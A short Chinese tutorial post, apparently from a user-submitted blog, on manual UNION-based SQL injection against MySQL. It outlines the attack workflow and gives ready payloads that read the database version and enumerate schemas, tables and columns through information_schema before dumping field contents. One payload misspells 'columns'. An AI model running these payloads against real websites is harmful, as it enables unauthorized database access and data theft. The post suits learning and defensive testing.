MySQL注入之显错注入(mysql sql注入)

网友投稿 383 2022-10-08


MySQL注入之显错注入(mysql sql注入)

Mysql相关知识点:

常用的sql语句:Select * from :从表里查询所有内容Where :有条件的从表里选取数据and或or:按条件选取数据order by :根据指定结果选取排序Limit0,1:从第一行起显示1条记录Union select :将多个表拼在一起

显错注入-联合查询(mysql)基本流程:是否存在注入点—>猜解字段数—>联合查询寻找输入点->利用系统自带库查询字段名和表名->获取我们需要的数据或权限

手工注入查询相关内容

猜测数据库版本:and 1=2 union select 1,version()

猜询数据库:and 1=2 union select 1,schema_name from information_schema.schemata limit 0,1

查询表名 :and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 1,1

查询字段名:and 1=2 union select 1,group_concat(column_name) from information_schema.cloumns where table_schema=database() and table_name =‘表名’

查询字段内容:and 1=2 union select 1,字段 from 表名


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

标签:流程
上一篇:Cisco ASA在NAT环境下与Router IKEv2的***隧道建立
下一篇:springboot 中 druid+jpa+MYSQL数据库配置过程
相关文章

 发表评论

暂时没有评论,来抢沙发吧~